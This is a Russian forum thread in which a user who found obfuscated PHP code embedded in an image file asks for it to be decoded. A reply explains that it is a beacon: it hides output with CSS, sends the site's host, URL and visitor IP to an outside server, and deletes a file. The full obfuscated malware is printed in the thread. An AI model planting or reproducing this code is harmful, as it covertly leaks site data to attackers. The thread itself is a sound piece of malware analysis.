Помогите расшифровать вредоносный код

Статус
В этой теме нельзя размещать новые ответы.

Demon425

Постоялец
Регистрация
9 Июл 2008
Сообщения
472
Реакции
120
В одной из картинок помимо самой картинки нашёл вот такой шелл

PHP:
<? $x13="\x64i\162n\x61m\145"; $x14="fil\x65"; $x15="\155\153d\x69r"; $x16="\165\156\154i\156\153"; 
$x0b="\0600\071";$x0c="no"; if($x0c=='ok'){$x15("\x74\145\163t_o\x6b",0777);}echo "\074s\164y\x6c\x65\076\142\x6f\x64\x79\173\146\157\x6e\164\055s\151z\x65:\x30\x70\170\x3bc\x6f\x6co\162:\x23\146ff}\074/\163\164yl\x65\076"; $x0d="\150\164\164\160\072\x2f/".$x13($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$x0e=$_SERVER['HTTP_HOST']; $x0f=$_SERVER['REMOTE_ADDR']; $x10 = array('127.0.0.1'); foreach ($x10 as $x11) { if($x11==$x0f) {}else{if($_SERVER['HTTP_HOST']==$x0f){}else{$x12 = @$x14("htt\160\x3a\057\057styk\141c\150\x2ew\163/c\157k\x5fma\x69\156\056\160\x68p?\147u\075$x0e\046\165s\145\162=$x0b\046\x69\x70=$x0f\x26f=$x0d"); $x16('rss_taib.png'); }}}?>
<? echo "\x3c\x73\164\x79\x6ce\x3e\142\157\x64y\173\146o\x6e\x74\x2d\163\x69\172\145\072\x30\160\x78\x3bc\x6fl\157\x72\x3a\x23\x66\x66\146\175</\163t\x79\x6c\145>";?>

Помогите расшифровать...
 
В одной из картинок помимо самой картинки нашёл вот такой шелл
Код:
x13 = dirname
x14 = file
x15 = mkdir
x16 = unlink
x0b = 009
x0c = no
в общем это "стучалка". Что бы скрыть различные эрроры и сообщения выводится
Код:
<style>body{font-size:0px;color:#fff}</style>
а потом скрипт стучится на урл
Код:
http://stykach.ws/cok_main.php?gu=localhost&user=009&ip=127.0.0.1&f=http://localhost/
где домен и ИП беруться ваши, и причем если запущен скрипт на локалхосте, то запрос не происходит. После "стучалки" удаляется файл "rss_taib.png"
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху